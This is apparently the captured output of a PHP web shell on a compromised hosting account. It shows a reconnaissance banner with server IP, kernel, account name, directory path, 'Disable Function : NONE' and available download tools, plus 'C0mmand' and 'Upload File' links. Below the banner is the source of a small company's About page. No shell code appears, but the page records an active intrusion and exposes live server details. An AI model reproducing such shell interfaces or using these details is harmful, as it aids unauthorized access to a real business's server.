Server IP : 103.53.40.154 / Your IP : 3.144.48.72 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/samingpvtltd.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include 'admin/config.php'; $sql = "SELECT * FROM tb2_about"; $run = mysqli_query($db,$sql); $data = mysqli_fetch_assoc($run); ?> <!-- About Start --> <div class="container-fluid bg-secondary p-0"> <div class="row g-0"> <div class="col-lg-6 py-6 px-5"> <h1 class="display-5 mb-4">Welcome To <span class="text-primary">Saming Pvt. Ltd.</span></h1> <h4 class="text-primary mb-4">Thank you for your confidence in us!</h4> <p class="mb-4"><?php echo $data['about_desc']?></p> <!-- <a href="" class="btn btn-primary py-md-3 px-md-5 rounded-pill">Get A Quote</a> --> </div> <div class="col-lg-6"> <div class="h-100 d-flex flex-column justify-content-center bg-primary p-5"> <div class="d-flex text-white mb-5"> <div class="d-flex flex-shrink-0 align-items-center justify-content-center bg-white text-primary rounded-circle mx-auto mb-4" style="width: 60px; height: 60px;"> <i class="fa fa-user-tie fs-4"></i> </div> <div class="ps-4"> <h3>E-Commerce solutions</h3> <p class="mb-0">Business planning is an essential part of any successful business.</p> </div> </div> <div class="d-flex text-white mb-5"> <div class="d-flex flex-shrink-0 align-items-center justify-content-center bg-white text-primary rounded-circle mx-auto mb-4" style="width: 60px; height: 60px;"> <i class="fa fa-chart-line fs-4"></i> </div> <div class="ps-4"> <h3>Bulk SMS services and email services.</h3> <p class="mb-0">Starting a business can be an exciting and challenging endeavor.</p> </div> </div> <div class="d-flex text-white"> <div class="d-flex flex-shrink-0 align-items-center justify-content-center bg-white text-primary rounded-circle mx-auto mb-4" style="width: 60px; height: 60px;"> <i class="fa fa-balance-scale fs-4"></i> </div> <div class="ps-4"> <h3>MLM software</h3> <p class="mb-0">Carrier planning is an important step in achieving your career goals.</p> </div> </div> </div> </div> </div> </div> <!-- About End -->